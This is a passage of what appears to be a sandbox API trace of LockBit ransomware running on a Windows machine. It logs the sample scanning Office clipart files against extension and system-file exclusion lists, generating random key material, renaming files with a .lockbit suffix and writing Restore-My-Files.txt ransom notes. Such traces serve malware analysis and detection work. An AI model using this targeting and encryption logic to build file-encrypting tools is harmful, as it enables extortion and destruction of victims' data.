ftLastAccessTime.dwLowDateTime=0x56583130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60b62300, ftLastWriteTime.dwHighDateTime=0x1be560f, nFileSizeHigh=0x0, nFileSizeLow=0x6e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0211981.WMF", cAlternateFileName="")) returned 1 [0152.001] lstrcmpiW (lpString1=".", lpString2="J0211981.WMF") returned -1 [0152.002] lstrcmpiW (lpString1="..", lpString2="J0211981.WMF") returned -1 [0152.002] PathFindExtensionW (pszPath="J0211981.WMF") returned=".WMF" [0152.002] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.002] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.003] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.003] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0211981.WMF") returned 1 [0152.003] lstrcmpiW (lpString1="ntldr", lpString2="J0211981.WMF") returned 1 [0152.003] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0211981.WMF") returned 1 [0152.004] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0211981.WMF") returned -1 [0152.004] lstrcmpiW (lpString1="autorun.inf", lpString2="J0211981.WMF") returned -1 [0152.004] lstrcmpiW (lpString1="thumbs.db", lpString2="J0211981.WMF") returned 1 [0152.004] lstrcmpiW (lpString1="iconcache.db", lpString2="J0211981.WMF") returned -1 [0152.004] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.004] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0211981.WMF") returned=".WMF" [0152.004] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.004] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.004] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.004] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.004] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.004] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.004] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.004] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.004] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.004] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.004] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.004] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.004] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.004] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.004] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.004] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.004] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.004] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.005] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.005] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.005] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.005] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.005] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.005] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.005] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.005] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.005] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.005] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.005] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0211981.WMF.lockbit") returned 72 [0152.005] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0211981.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0211981.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0152.006] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.006] malloc (_Size=0x40068) returned 0x3e70008 [0152.006] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=28276) returned 1 [0152.006] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.006] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.006] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0152.006] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.007] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.007] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0152.007] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0152.011] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0211981.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0211981.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.011] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.011] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.012] free (_Block=0x1fa2ed8) [0152.012] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0211981.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.012] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.012] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.012] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56583130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x180e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0212299.WMF", cAlternateFileName="")) returned 1 [0152.012] lstrcmpiW (lpString1=".", lpString2="J0212299.WMF") returned -1 [0152.012] lstrcmpiW (lpString1="..", lpString2="J0212299.WMF") returned -1 [0152.012] PathFindExtensionW (pszPath="J0212299.WMF") returned=".WMF" [0152.012] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.012] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.012] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.012] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.012] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.012] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.012] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.012] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.012] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.013] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.013] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.014] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.014] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.014] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.014] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.014] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.014] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.014] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0212299.WMF") returned 1 [0152.014] lstrcmpiW (lpString1="ntldr", lpString2="J0212299.WMF") returned 1 [0152.014] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0212299.WMF") returned 1 [0152.014] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0212299.WMF") returned -1 [0152.014] lstrcmpiW (lpString1="autorun.inf", lpString2="J0212299.WMF") returned -1 [0152.014] lstrcmpiW (lpString1="thumbs.db", lpString2="J0212299.WMF") returned 1 [0152.014] lstrcmpiW (lpString1="iconcache.db", lpString2="J0212299.WMF") returned -1 [0152.014] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.014] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212299.WMF") returned=".WMF" [0152.014] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.014] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.014] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.014] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.014] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.014] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.014] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.014] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.014] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.014] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.014] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.014] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.014] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.014] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.014] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.014] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.014] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.015] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.015] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.015] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.015] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.015] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.015] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.015] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.015] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.015] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.015] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.015] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.015] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212299.WMF.lockbit") returned 72 [0152.015] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212299.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0212299.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0152.019] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.019] malloc (_Size=0x40068) returned 0x3f70048 [0152.020] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=6158) returned 1 [0152.020] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.020] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0152.020] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.021] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0152.021] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0152.023] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212299.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212299.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.023] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.023] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.024] free (_Block=0x1fa2ed8) [0152.024] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212299.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.024] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.024] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.024] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56583130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x25cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0212601.WMF", cAlternateFileName="")) returned 1 [0152.024] lstrcmpiW (lpString1=".", lpString2="J0212601.WMF") returned -1 [0152.024] lstrcmpiW (lpString1="..", lpString2="J0212601.WMF") returned -1 [0152.024] PathFindExtensionW (pszPath="J0212601.WMF") returned=".WMF" [0152.024] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.024] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.025] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.025] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.025] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.025] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.025] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.025] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.025] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.025] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.025] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.025] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.025] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.025] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.025] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.025] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.025] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.025] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.025] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.025] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.025] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.025] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.025] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.026] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.026] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0212601.WMF") returned 1 [0152.027] lstrcmpiW (lpString1="ntldr", lpString2="J0212601.WMF") returned 1 [0152.027] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0212601.WMF") returned 1 [0152.027] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0212601.WMF") returned -1 [0152.027] lstrcmpiW (lpString1="autorun.inf", lpString2="J0212601.WMF") returned -1 [0152.027] lstrcmpiW (lpString1="thumbs.db", lpString2="J0212601.WMF") returned 1 [0152.027] lstrcmpiW (lpString1="iconcache.db", lpString2="J0212601.WMF") returned -1 [0152.027] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.027] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212601.WMF") returned=".WMF" [0152.027] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.027] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.027] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.027] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.027] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.027] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.027] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.027] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.027] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.027] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.027] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.027] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.027] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.027] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.027] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.027] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.027] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.028] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.028] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.028] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.028] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.028] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.028] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.028] 